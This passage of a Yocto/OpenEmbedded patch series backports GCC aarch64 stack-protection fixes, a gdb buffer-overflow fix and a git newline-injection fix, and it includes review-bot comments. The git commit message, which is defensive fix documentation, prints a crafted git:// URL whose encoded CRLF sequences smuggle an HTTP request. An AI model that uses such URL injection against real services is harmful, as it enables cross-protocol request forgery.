+@@ -5508,16 +5519,9 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
+ HOST_WIDE_INT guard_used_by_caller = STACK_CLASH_CALLER_GUARD;
+ HOST_WIDE_INT byte_sp_alignment = STACK_BOUNDARY / BITS_PER_UNIT;
+ gcc_assert (multiple_p (poly_size, byte_sp_alignment));
+- /* When doing the final adjustment for the outgoing argument size we can't
+- assume that LR was saved at position 0. So subtract it's offset from the
+- ABI safe buffer so that we don't accidentally allow an adjustment that
+- would result in an allocation larger than the ABI buffer without
+- probing. */
+ HOST_WIDE_INT min_probe_threshold
+ = final_adjustment_p
+- ? (guard_used_by_caller
+- + byte_sp_alignment
+- - cfun->machine->frame.reg_offset[LR_REGNUM])
++ ? guard_used_by_caller + byte_sp_alignment
+ : guard_size - guard_used_by_caller;
+
+ poly_int64 frame_size = cfun->machine->frame.frame_size;
+@@ -5697,8 +5701,8 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
+ if (final_adjustment_p && rounded_size != 0)
+ min_probe_threshold = 0;
+ /* If doing a small final adjustment, we always probe at offset 0.
+- This is done to avoid issues when LR is not at position 0 or when
+- the final adjustment is smaller than the probing offset. */
++ This is done to avoid issues when the final adjustment is smaller
++ than the probing offset. */
+ else if (final_adjustment_p && rounded_size == 0)
+ residual_probe_offset = 0;
+
+diff --git a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
+new file mode 100644
+index 00000000000..82447d20fff
+--- /dev/null
++++ b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
+@@ -0,0 +1,100 @@
++/* { dg-options "-O2 -fstack-clash-protection -fomit-frame-pointer --param stack-clash-protection-guard-size=12" } */
++/* { dg-final { check-function-bodies "**" "" } } */
++
++void f(int, ...);
++void g();
++
++/*
++** test1:
++** ...
++** str x30, \[sp\]
++** sub sp, sp, #4064
++** str xzr, \[sp\]
++** cbnz w0, .*
++** bl g
++** ...
++** str x26, \[sp, #?4128\]
++** ...
++*/
++int test1(int z) {
++ __uint128_t x = 0;
++ int y[0x400];
++ if (z)
++ {
++ asm volatile ("" :::
++ "x19", "x20", "x21", "x22", "x23", "x24", "x25", "x26");
++ f(0, 0, 0, 0, 0, 0, 0, &y,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x);
++ }
++ g();
++ return 1;
++}
++
++/*
++** test2:
++** ...
++** str x30, \[sp\]
++** sub sp, sp, #1040
++** str xzr, \[sp\]
++** cbnz w0, .*
++** bl g
++** ...
++*/
++int test2(int z) {
++ __uint128_t x = 0;
++ int y[0x400];
++ if (z)
++ {
++ asm volatile ("" :::
++ "x19", "x20", "x21", "x22", "x23", "x24", "x25", "x26");
++ f(0, 0, 0, 0, 0, 0, 0, &y,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x);
++ }
++ g();
++ return 1;
++}
++
++/*
++** test3:
++** ...
++** str x30, \[sp\]
++** sub sp, sp, #1024
++** cbnz w0, .*
++** bl g
++** ...
++*/
++int test3(int z) {
++ __uint128_t x = 0;
++ int y[0x400];
++ if (z)
++ {
++ asm volatile ("" :::
++ "x19", "x20", "x21", "x22", "x23", "x24", "x25", "x26");
++ f(0, 0, 0, 0, 0, 0, 0, &y,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x,
++ x, x, x, x, x, x, x, x, x, x, x, x, x, x, x, x);
++ }
++ g();
++ return 1;
++}
+--
+2.34.1
+
+
+From f2684e63652bb251d22c79e40081c646df1f36b6 Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Tue, 8 Aug 2023 01:57:26 +0100
+Subject: [PATCH 09/10] aarch64: Simplify probe of final frame allocation
+
+Previous patches ensured that the final frame allocation only needs
+a probe when the size is strictly greater than 1KiB. It's therefore
+safe to use the normal 1024 probe offset in all cases.
+
+The main motivation for doing this is to simplify the code and
+remove the number of special cases.
+
+gcc/
+ * config/aarch64/aarch64.c (aarch64_allocate_and_probe_stack_space):
+ Always probe the residual allocation at offset 1024, asserting
+ that that is in range.
+
+gcc/testsuite/
+ * gcc.target/aarch64/stack-check-prologue-17.c: Expect the probe
+ to be at offset 1024 rather than offset 0.
+ * gcc.target/aarch64/stack-check-prologue-18.c: Likewise.
+---
+ gcc/config/aarch64/aarch64.c | 12 ++++--------
+ .../gcc.target/aarch64/stack-check-prologue-17.c | 2 +-
+ .../gcc.target/aarch64/stack-check-prologue-18.c | 7 +++++--
+ 3 files changed, 10 insertions(+), 11 deletions(-)
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index 1e8467fdd03..705f719a2ea 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -5695,16 +5695,12 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
+ are still safe. */
+ if (residual)
+ {
+- HOST_WIDE_INT residual_probe_offset = guard_used_by_caller;
++ gcc_assert (guard_used_by_caller + byte_sp_alignment <= size);
++
+ /* If we're doing final adjustments, and we've done any full page
+ allocations then any residual needs to be probed. */
+ if (final_adjustment_p && rounded_size != 0)
+ min_probe_threshold = 0;
+- /* If doing a small final adjustment, we always probe at offset 0.
+- This is done to avoid issues when the final adjustment is smaller
+- than the probing offset. */
+- else if (final_adjustment_p && rounded_size == 0)
+- residual_probe_offset = 0;
+
+ aarch64_sub_sp (temp1, temp2, residual, frame_related_p);
+ if (residual >= min_probe_threshold)
+@@ -5715,8 +5711,8 @@ aarch64_allocate_and_probe_stack_space (rtx temp1, rtx temp2,
+ HOST_WIDE_INT_PRINT_DEC " bytes, probing will be required."
+ "\n", residual);
+
+- emit_stack_probe (plus_constant (Pmode, stack_pointer_rtx,
+- residual_probe_offset));
++ emit_stack_probe (plus_constant (Pmode, stack_pointer_rtx,
++ guard_used_by_caller));
+ emit_insn (gen_blockage ());
+ }
+ }
+diff --git a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
+index 0d8a25d73a2..f0ec1389771 100644
+--- a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
++++ b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-17.c
+@@ -33,7 +33,7 @@ int test1(int z) {
+ ** ...
+ ** str x30, \[sp\]
+ ** sub sp, sp, #1040
+-** str xzr, \[sp\]
++** str xzr, \[sp, #?1024\]
+ ** cbnz w0, .*
+ ** bl g
+ ** ...
+diff --git a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
+index 82447d20fff..71d33ba34e9 100644
+--- a/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
++++ b/gcc/testsuite/gcc.target/aarch64/stack-check-prologue-18.c
+@@ -8,8 +8,9 @@ void g();
+ ** test1:
+ ** ...
+ ** str x30, \[sp\]
++** ...
+ ** sub sp, sp, #4064
+-** str xzr, \[sp\]
++** str xzr, \[sp, #?1024\]
+ ** cbnz w0, .*
+ ** bl g
+ ** ...
+@@ -49,8 +50,9 @@ int test1(int z) {
+ ** test2:
+ ** ...
+ ** str x30, \[sp\]
++** ...
+ ** sub sp, sp, #1040
+-** str xzr, \[sp\]
++** str xzr, \[sp, #?1024\]
+ ** cbnz w0, .*
+ ** bl g
+ ** ...
+@@ -77,6 +79,7 @@ int test2(int z) {
+ ** test3:
+ ** ...
+ ** str x30, \[sp\]
++** ...
+ ** sub sp, sp, #1024
+ ** cbnz w0, .*
+ ** bl g
+--
+2.34.1
+
+
+From bf3eeaa0182a92987570d9c787bd45079eebf528 Mon Sep 17 00:00:00 2001
+From: Richard Sandiford <richard.sandiford@arm.com>
+Date: Thu, 15 Jun 2023 19:16:52 +0100
+Subject: [PATCH 10/10] aarch64: Make stack smash canary protect saved
+ registers
+
+AArch64 normally puts the saved registers near the bottom of the frame,
+immediately above any dynamic allocations. But this means that a
+stack-smash attack on those dynamic allocations could overwrite the
+saved registers without needing to reach as far as the stack smash
+canary.
+
+The same thing could also happen for variable-sized arguments that are
+passed by value, since those are allocated before a call and popped on
+return.
+
+This patch avoids that by putting the locals (and thus the canary) below
+the saved registers when stack smash protection is active.
+
+The patch fixes CVE-2023-4039.
+
+gcc/
+ * config/aarch64/aarch64.c (aarch64_save_regs_above_locals_p):
+ New function.
+ (aarch64_layout_frame): Use it to decide whether locals should
+ go above or below the saved registers.
+ (aarch64_expand_prologue): Update stack layout comment.
+ Emit a stack tie after the final adjustment.
+
+gcc/testsuite/
+ * gcc.target/aarch64/stack-protector-8.c: New test.
+ * gcc.target/aarch64/stack-protector-9.c: Likewise.
+---
+ gcc/config/aarch64/aarch64.c | 46 +++++++++++++--
+ .../gcc.target/aarch64/stack-protector-8.c | 58 +++++++++++++++++++
+ .../gcc.target/aarch64/stack-protector-9.c | 33 +++++++++++
+ 3 files changed, 133 insertions(+), 4 deletions(-)
+ create mode 100644 gcc/testsuite/gcc.target/aarch64/stack-protector-8.c
+ create mode 100644 gcc/testsuite/gcc.target/aarch64/stack-protector-9.c
+
+diff --git a/gcc/config/aarch64/aarch64.c b/gcc/config/aarch64/aarch64.c
+index 705f719a2ea..3d094214fac 100644
+--- a/gcc/config/aarch64/aarch64.c
++++ b/gcc/config/aarch64/aarch64.c
+@@ -4622,6 +4622,20 @@ aarch64_needs_frame_chain (void)
+ return aarch64_use_frame_pointer;
+ }
+
++/* Return true if the current function should save registers above
++ the locals area, rather than below it. */
++
++static bool
++aarch64_save_regs_above_locals_p ()
++{
++ /* When using stack smash protection, make sure that the canary slot
++ comes between the locals and the saved registers. Otherwise,
++ it would be possible for a carefully sized smash attack to change
++ the saved registers (particularly LR and FP) without reaching the
++ canary. */
++ return crtl->stack_protect_guard;
++}
++
+ /* Mark the registers that need to be saved by the callee and calculate
+ the size of the callee-saved registers area and frame record (both FP
+ and LR may be omitted). */
+@@ -4686,6 +4700,16 @@ aarch64_layout_frame (void)
+
+ cfun->machine->frame.bytes_below_hard_fp = crtl->outgoing_args_size;
+
++ bool regs_at_top_p = aarch64_save_regs_above_locals_p ();
++
++ if (regs_at_top_p)
++ {
++ cfun->machine->frame.bytes_below_hard_fp += get_frame_size ();
++ cfun->machine->frame.bytes_below_hard_fp
++ = aligned_upper_bound (cfun->machine->frame.bytes_below_hard_fp,
++ STACK_BOUNDARY / BITS_PER_UNIT);
++ }
++
+ #define ALLOCATE_GPR_SLOT(REGNO) \
+ do \
+ { \
+@@ -4758,9 +4782,11 @@ aarch64_layout_frame (void)
+ HOST_WIDE_INT varargs_and_saved_regs_size
+ = offset + cfun->machine->frame.saved_varargs_size;
+
++ cfun->machine->frame.bytes_above_hard_fp = varargs_and_saved_regs_size;
++ if (!regs_at_top_p)
++ cfun->machine->frame.bytes_above_hard_fp += get_frame_size ();
+ cfun->machine->frame.bytes_above_hard_fp
+- = aligned_upper_bound (varargs_and_saved_regs_size
+- + get_frame_size (),
++ = aligned_upper_bound (cfun->machine->frame.bytes_above_hard_fp,
+ STACK_BOUNDARY / BITS_PER_UNIT);
+
+ /* Both these values are already aligned. */
+@@ -4772,6 +4798,9 @@ aarch64_layout_frame (void)
+
+ cfun->machine->frame.bytes_above_locals
+ = cfun->machine->frame.saved_varargs_size;
++ if (regs_at_top_p)
++ cfun->machine->frame.bytes_above_locals
++ += cfun->machine->frame.saved_regs_size;
+
+ cfun->machine->frame.initial_adjust = 0;
+ cfun->machine->frame.final_adjust = 0;
+@@ -5764,10 +5793,10 @@ aarch64_add_cfa_expression (rtx_insn *insn, unsigned int reg,
+ | for register varargs |
+ | |
+ +-------------------------------+
+- | local variables | <-- frame_pointer_rtx
++ | local variables (1) | <-- frame_pointer_rtx
+ | |
+ +-------------------------------+
+- | padding | \
++ | padding (1) | \
+ +-------------------------------+ |
+ | callee-saved registers | | frame.saved_regs_size
+ +-------------------------------+ |
+@@ -5775,6 +5804,10 @@ aarch64_add_cfa_expression (rtx_insn *insn, unsigned int reg,
+ +-------------------------------+ |
+ | FP' | / <- hard_frame_pointer_rtx (aligned)
+ +-------------------------------+
++ | local variables (2) |
++ +-------------------------------+
++ | padding (2) |
++ +-------------------------------+
+ | dynamic allocation |
+ +-------------------------------+
+ | padding |
+@@ -5784,6 +5817,9 @@ aarch64_add_cfa_expression (rtx_insn *insn, unsigned int reg,
+ +-------------------------------+
+ | | <-- stack_pointer_rtx (aligned)
+
++ The regions marked (1) and (2) are mutually exclusive. (2) is used
++ when aarch64_save_regs_above_locals_p is true.
++
+ Dynamic stack allocations via alloca() decrease stack_pointer_rtx
+ but leave frame_pointer_rtx and hard_frame_pointer_rtx
+ unchanged.
+@@ -5937,6 +5973,8 @@ aarch64_expand_prologue (void)
+ that is assumed by the called. */
+ aarch64_allocate_and_probe_stack_space (tmp1_rtx, tmp0_rtx, final_adjust,
+ !frame_pointer_needed, true);
++ if (emit_frame_chain && maybe_ne (final_adjust, 0))
++ emit_insn (gen_stack_tie (stack_pointer_rtx, hard_frame_pointer_rtx));
+ }
+
+ /* Return TRUE if we can use a simple_return insn.
+diff --git a/gcc/testsuite/gcc.target/aarch64/stack-protector-8.c b/gcc/testsuite/gcc.target/aarch64/stack-protector-8.c
+new file mode 100644
+index 00000000000..c5e7deef6c1
+--- /dev/null
++++ b/gcc/testsuite/gcc.target/aarch64/stack-protector-8.c
+@@ -0,0 +1,58 @@
++/* { dg-options " -O -fstack-protector-strong -mstack-protector-guard=sysreg -mstack-protector-guard-reg=tpidr2_el0 -mstack-protector-guard-offset=16" } */
++/* { dg-final { check-function-bodies "**" "" } } */
++
++void g(void *);
++
++/*
++** test1:
++** sub sp, sp, #288
++** stp x29, x30, \[sp, #?272\]
++** add x29, sp, #?272
++** mrs (x[0-9]+), tpidr2_el0
++** ldr (x[0-9]+), \[\1, #?16\]
++** str \2, \[sp, #?264\]
++** mov \2, *0
++** add x0, sp, #?8
++** bl g
++** ...
++** mrs .*
++** ...
++** bne .*
++** ...
++** ldp x29, x30, \[sp, #?272\]
++** add sp, sp, #?288
++** ret
++** bl __stack_chk_fail
++*/
++int test1() {
++ int y[0x40];
++ g(y);
++ return 1;
++}
++
++/*
++** test2:
++** stp x29, x30, \[sp, #?-16\]!
++** mov x29, sp
++** sub sp, sp, #1040
++** mrs (x[0-9]+), tpidr2_el0
++** ldr (x[0-9]+), \[\1, #?16\]
++** str \2, \[sp, #?1032\]
++** mov \2, *0
++** add x0, sp, #?8
++** bl g
++** ...
++** mrs .*
++** ...
++** bne .*
++** ...
++** add sp, sp, #?1040
++** ldp x29, x30, \[sp\], #?16
++** ret
++** bl __stack_chk_fail
++*/
++int test2() {
++ int y[0x100];
++ g(y);
++ return 1;
++}
+diff --git a/gcc/testsuite/gcc.target/aarch64/stack-protector-9.c b/gcc/testsuite/gcc.target/aarch64/stack-protector-9.c
+new file mode 100644
+index 00000000000..58f322aa480
+--- /dev/null
++++ b/gcc/testsuite/gcc.target/aarch64/stack-protector-9.c
+@@ -0,0 +1,33 @@
++/* { dg-options "-O2 -mcpu=neoverse-v1 -fstack-protector-all" } */
++/* { dg-final { check-function-bodies "**" "" } } */
++
++/*
++** main:
++** ...
++** stp x29, x30, \[sp, #?-[0-9]+\]!
++** ...
++** sub sp, sp, #[0-9]+
++** ...
++** str x[0-9]+, \[x29, #?-8\]
++** ...
++*/
++int f(const char *);
++void g(void *);
++int main(int argc, char* argv[])
++{
++ int a;
++ int b;
++ char c[2+f(argv[1])];
++ int d[0x100];
++ char y;
++
++ y=42; a=4; b=10;
++ c[0] = 'h'; c[1] = '\0';
++
++ c[f(argv[2])] = '\0';
++
++ __builtin_printf("%d %d\n%s\n", a, b, c);
++ g(d);
++
++ return 0;
++}
+--
+2.34.1
+
diff --git a/meta/recipes-devtools/gcc/gcc-common.inc b/meta/recipes-devtools/gcc/gcc-common.inc
index 3dcfdf835f..69a3536965 100644
--- a/meta/recipes-devtools/gcc/gcc-common.inc
+++ b/meta/recipes-devtools/gcc/gcc-common.inc
@@ -1,5 +1,6 @@
SUMMARY = "GNU cc and gcc C compilers"
HOMEPAGE = "http://www.gnu.org/software/gcc/"
+DESCRIPTION = "The GNU Compiler Collection includes front ends for C, C++, Objective-C, Fortran, Ada, Go, and D, as well as libraries for these languages (libstdc++,...). GCC was originally written as the compiler for the GNU operating system."
SECTION = "devel"
LICENSE = "GPL"
@@ -99,7 +100,7 @@ BINV = "${PV}"
#S = "${WORKDIR}/gcc-${PV}"
S = "${TMPDIR}/work-shared/gcc-${PV}-${PR}/gcc-${PV}"
-B = "${WORKDIR}/gcc-${PV}/build.${HOST_SYS}.${TARGET_SYS}"
+B ?= "${WORKDIR}/gcc-${PV}/build.${HOST_SYS}.${TARGET_SYS}"
target_includedir ?= "${includedir}"
target_libdir ?= "${libdir}"
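Review bot: The change of `B` from `=` to `?=` in the second hunk is undocumented, and it makes the effective build directory depend on parse order, since `?=` assigns only when `B` is still unset at the point this line is read. The same commit adds `B = "${WORKDIR}/build"` to gcc-source.inc, which is presumably the override this is meant to allow, but nothing in either file says so. A short comment above the assignment, for example `# Weak default: gcc-source.inc sets its own B`, would record the intent and the ordering assumption for the next maintainer.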
diff --git a/meta/recipes-devtools/gcc/gcc-cross-canadian_9.3.bb b/meta/recipes-devtools/gcc/gcc-cross-canadian_9.5.bb
index bf53c5cd78..bf53c5cd78 100644
--- a/meta/recipes-devtools/gcc/gcc-cross-canadian_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-cross-canadian_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-cross_9.3.bb b/meta/recipes-devtools/gcc/gcc-cross_9.5.bb
index b43cca0c52..b43cca0c52 100644
--- a/meta/recipes-devtools/gcc/gcc-cross_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-cross_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-crosssdk_9.3.bb b/meta/recipes-devtools/gcc/gcc-crosssdk_9.5.bb
index 40a6c4feff..40a6c4feff 100644
--- a/meta/recipes-devtools/gcc/gcc-crosssdk_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-crosssdk_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-runtime_9.3.bb b/meta/recipes-devtools/gcc/gcc-runtime_9.5.bb
index dd430b57eb..dd430b57eb 100644
--- a/meta/recipes-devtools/gcc/gcc-runtime_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-runtime_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-sanitizers_9.3.bb b/meta/recipes-devtools/gcc/gcc-sanitizers_9.5.bb
index f3c7058114..f3c7058114 100644
--- a/meta/recipes-devtools/gcc/gcc-sanitizers_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-sanitizers_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc-shared-source.inc b/meta/recipes-devtools/gcc/gcc-shared-source.inc
index aac4b49313..4baf7874d2 100644
--- a/meta/recipes-devtools/gcc/gcc-shared-source.inc
+++ b/meta/recipes-devtools/gcc/gcc-shared-source.inc
@@ -9,3 +9,6 @@ SRC_URI = ""
do_configure[depends] += "gcc-source-${PV}:do_preconfigure"
do_populate_lic[depends] += "gcc-source-${PV}:do_unpack"
+
+# patch is available via gcc-source recipe
+CVE_CHECK_WHITELIST += "CVE-2023-4039"
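Review bot: The `CVE_CHECK_WHITELIST` entry suppresses CVE-2023-4039 unconditionally for every recipe that includes gcc-shared-source.inc, and the comment does not name the patch that justifies it. If that patch is later dropped from the gcc-source recipe, the CVE check will keep treating these recipes as not affected and nothing will flag the regression. A more traceable comment would be `# CVE-2023-4039: fixed by <patch file name> in gcc-source-${PV}; remove this entry if that patch is dropped`, with the placeholder replaced by the real file name.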
diff --git a/meta/recipes-devtools/gcc/gcc-source.inc b/meta/recipes-devtools/gcc/gcc-source.inc
index 03bab97815..224b7778ef 100644
--- a/meta/recipes-devtools/gcc/gcc-source.inc
+++ b/meta/recipes-devtools/gcc/gcc-source.inc
@@ -18,6 +18,7 @@ INHIBIT_DEFAULT_DEPS = "1"
DEPENDS = ""
PACKAGES = ""
+B = "${WORKDIR}/build"
# This needs to be Python to avoid lots of shell variables becoming dependencies.
python do_preconfigure () {
diff --git a/meta/recipes-devtools/gcc/gcc-source_9.3.bb b/meta/recipes-devtools/gcc/gcc-source_9.5.bb
index b890fa33ea..b890fa33ea 100644
--- a/meta/recipes-devtools/gcc/gcc-source_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc-source_9.5.bb
diff --git a/meta/recipes-devtools/gcc/gcc_9.3.bb b/meta/recipes-devtools/gcc/gcc_9.5.bb
index 7d93590588..7d93590588 100644
--- a/meta/recipes-devtools/gcc/gcc_9.3.bb
+++ b/meta/recipes-devtools/gcc/gcc_9.5.bb
diff --git a/meta/recipes-devtools/gcc/libgcc-initial_9.3.bb b/meta/recipes-devtools/gcc/libgcc-initial_9.5.bb
index 0c698c26ec..0c698c26ec 100644
--- a/meta/recipes-devtools/gcc/libgcc-initial_9.3.bb
+++ b/meta/recipes-devtools/gcc/libgcc-initial_9.5.bb
diff --git a/meta/recipes-devtools/gcc/libgcc_9.3.bb b/meta/recipes-devtools/gcc/libgcc_9.5.bb
index ea210a1130..ea210a1130 100644
--- a/meta/recipes-devtools/gcc/libgcc_9.3.bb
+++ b/meta/recipes-devtools/gcc/libgcc_9.5.bb
diff --git a/meta/recipes-devtools/gcc/libgfortran_9.3.bb b/meta/recipes-devtools/gcc/libgfortran_9.5.bb
index 71dd8b4bdc..71dd8b4bdc 100644
--- a/meta/recipes-devtools/gcc/libgfortran_9.3.bb
+++ b/meta/recipes-devtools/gcc/libgfortran_9.5.bb
diff --git a/meta/recipes-devtools/gdb/gdb-9.1.inc b/meta/recipes-devtools/gdb/gdb-9.1.inc
index d019e6b384..212c554cf1 100644
--- a/meta/recipes-devtools/gdb/gdb-9.1.inc
+++ b/meta/recipes-devtools/gdb/gdb-9.1.inc
@@ -16,6 +16,7 @@ SRC_URI = "${GNU_MIRROR}/gdb/gdb-${PV}.tar.xz \
file://0009-resolve-restrict-keyword-conflict.patch \
file://0010-Fix-invalid-sigprocmask-call.patch \
file://0011-gdbserver-ctrl-c-handling.patch \
+ file://0012-CVE-2023-39128.patch \
"
SRC_URI[md5sum] = "f7e9f6236c425097d9e5f18a6ac40655"
SRC_URI[sha256sum] = "699e0ec832fdd2f21c8266171ea5bf44024bd05164fdf064e4d10cc4cf0d1737"
diff --git a/meta/recipes-devtools/gdb/gdb-common.inc b/meta/recipes-devtools/gdb/gdb-common.inc
index 08f615addf..7a4793a73f 100644
--- a/meta/recipes-devtools/gdb/gdb-common.inc
+++ b/meta/recipes-devtools/gdb/gdb-common.inc
@@ -1,5 +1,6 @@
SUMMARY = "GNU debugger"
HOMEPAGE = "http://www.gnu.org/software/gdb/"
+DESCRIPTION = "GDB, the GNU Project debugger, allows you to see what is going on inside another program while it executes -- or what another program was doing at the moment it crashed."
SECTION = "devel"
DEPENDS = "expat zlib ncurses virtual/libiconv ${LTTNGUST} bison-native"
diff --git a/meta/recipes-devtools/gdb/gdb/0012-CVE-2023-39128.patch b/meta/recipes-devtools/gdb/gdb/0012-CVE-2023-39128.patch
new file mode 100644
index 0000000000..6445455bde
--- /dev/null
+++ b/meta/recipes-devtools/gdb/gdb/0012-CVE-2023-39128.patch
@@ -0,0 +1,75 @@
+From 033bc52bb6190393c8eed80925fa78cc35b40c6d Mon Sep 17 00:00:00 2001
+From: Tom Tromey <tromey@adacore.com>
+Date: Wed, 16 Aug 2023 11:29:19 -0600
+Subject: [PATCH] Avoid buffer overflow in ada_decode
+
+A bug report pointed out a buffer overflow in ada_decode, which Keith
+helpfully analyzed. ada_decode had a logic error when the input was
+all digits. While this isn't valid -- and would probably only appear
+in fuzzer tests -- it still should be handled properly.
+
+This patch adds a missing bounds check. Tested with the self-tests in
+an asan build.
+
+Bug: https://sourceware.org/bugzilla/show_bug.cgi?id=30639
+Reviewed-by: Keith Seitz <keiths@redhat.com>
+
+Upstream-Status: Backport from [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=033bc52bb6190393c8eed80925fa78cc35b40c6d]
+CVE: CVE-2023-39128
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ gdb/ada-lang.c | 19 ++++++++++++++++++-
+ 1 file changed, 18 insertions(+), 1 deletion(-)
+
+diff --git a/gdb/ada-lang.c b/gdb/ada-lang.c
+index 0c2d4fc..40852b6 100644
+--- a/gdb/ada-lang.c
++++ b/gdb/ada-lang.c
+@@ -56,6 +56,7 @@
+ #include "cli/cli-utils.h"
+ #include "gdbsupport/function-view.h"
+ #include "gdbsupport/byte-vector.h"
++#include "gdbsupport/selftest.h"
+ #include <algorithm>
+
+ /* Define whether or not the C operator '/' truncates towards zero for
+@@ -1184,7 +1185,7 @@ ada_decode (const char *encoded)
+ i -= 1;
+ if (i > 1 && encoded[i] == '_' && encoded[i - 1] == '_')
+ len0 = i - 1;
+- else if (encoded[i] == '$')
++ else if (i >= 0 && encoded[i] == '$')
+ len0 = i;
+ }
+
+@@ -1350,6 +1351,18 @@ Suppress:
+
+ }
+
++#ifdef GDB_SELF_TEST
++
++static void
++ada_decode_tests ()
++{
++ /* This isn't valid, but used to cause a crash. PR gdb/30639. The
++ result does not really matter very much. */
++ SELF_CHECK (ada_decode ("44") == "44");
++}
++
++#endif
++
+ /* Table for keeping permanent unique copies of decoded names. Once
+ allocated, names in this table are never released. While this is a
+ storage leak, it should not be significant unless there are massive
+@@ -14345,4 +14358,8 @@ DWARF attribute."),
+ gdb::observers::new_objfile.attach (ada_new_objfile_observer);
+ gdb::observers::free_objfile.attach (ada_free_objfile_observer);
+ gdb::observers::inferior_exit.attach (ada_inferior_exit);
++
++#ifdef GDB_SELF_TEST
++ selftests::register_test ("ada-decode", ada_decode_tests);
++#endif
+ }
+--
+2.24.4
+
diff --git a/meta/recipes-devtools/git/files/CVE-2021-40330.patch b/meta/recipes-devtools/git/files/CVE-2021-40330.patch
new file mode 100644
index 0000000000..725f98f0b7
--- /dev/null
+++ b/meta/recipes-devtools/git/files/CVE-2021-40330.patch
@@ -0,0 +1,108 @@
+From e77ca0c7d577408878d2b3e8c7336e6119cb3931 Mon Sep 17 00:00:00 2001
+From: Minjae Kim <flowergom@gmail.com>
+Date: Thu, 25 Nov 2021 06:36:26 +0000
+Subject: [PATCH] git_connect_git(): forbid newlines in host and path
+
+When we connect to a git:// server, we send an initial request that
+looks something like:
+
+ 002dgit-upload-pack repo.git\0host=example.com
+
+If the repo path contains a newline, then it's included literally, and
+we get:
+
+ 002egit-upload-pack repo
+ .git\0host=example.com
+
+This works fine if you really do have a newline in your repository name;
+the server side uses the pktline framing to parse the string, not
+newlines. However, there are many _other_ protocols in the wild that do
+parse on newlines, such as HTTP. So a carefully constructed git:// URL
+can actually turn into a valid HTTP request. For example:
+
+ git://localhost:1234/%0d%0a%0d%0aGET%20/%20HTTP/1.1 %0d%0aHost:localhost%0d%0a%0d%0a
+
+becomes:
+
+ 0050git-upload-pack /
+ GET / HTTP/1.1
+ Host:localhost
+
+ host=localhost:1234
+
+on the wire. Again, this isn't a problem for a real Git server, but it
+does mean that feeding a malicious URL to Git (e.g., through a
+submodule) can cause it to make unexpected cross-protocol requests.
+Since repository names with newlines are presumably quite rare (and
+indeed, we already disallow them in git-over-http), let's just disallow
+them over this protocol.
+
+Hostnames could likewise inject a newline, but this is unlikely a
+problem in practice; we'd try resolving the hostname with a newline in
+it, which wouldn't work. Still, it doesn't hurt to err on the side of
+caution there, since we would not expect them to work in the first
+place.
+
+The ssh and local code paths are unaffected by this patch. In both cases
+we're trying to run upload-pack via a shell, and will quote the newline
+so that it makes it intact. An attacker can point an ssh url at an
+arbitrary port, of course, but unless there's an actual ssh server
+there, we'd never get as far as sending our shell command anyway. We
+_could_ similarly restrict newlines in those protocols out of caution,
+but there seems little benefit to doing so.
+
+The new test here is run alongside the git-daemon tests, which cover the
+same protocol, but it shouldn't actually contact the daemon at all. In
+theory we could make the test more robust by setting up an actual
+repository with a newline in it (so that our clone would succeed if our
+new check didn't kick in). But a repo directory with newline in it is
+likely not portable across all filesystems. Likewise, we could check
